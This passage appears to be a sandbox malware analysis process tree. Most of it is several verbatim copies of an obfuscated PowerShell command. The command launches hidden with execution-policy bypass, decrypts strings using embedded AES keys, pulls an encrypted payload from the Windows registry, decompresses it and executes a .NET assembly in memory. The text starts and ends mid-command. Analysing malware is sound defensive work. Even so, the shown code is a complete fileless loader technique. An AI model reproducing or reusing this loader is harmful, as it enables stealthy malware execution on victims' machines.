'')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        30⤵
        
        PID:3544
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(3644).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        30⤵
        Hide Artifacts: Hidden Window
        
        PID:8216
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(3644).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        30⤵
        
        PID:5720
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(3644).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        30⤵
        
        PID:9496
        
        C:\Windows\system32\wermgr.exe
        
        "C:\Windows\system32\wermgr.exe" "-outproc" "0" "3644" "3200" "3108" "3204" "0" "0" "3208" "0" "0" "0" "0" "0"
        30⤵
        
        PID:4484
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(3744).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = 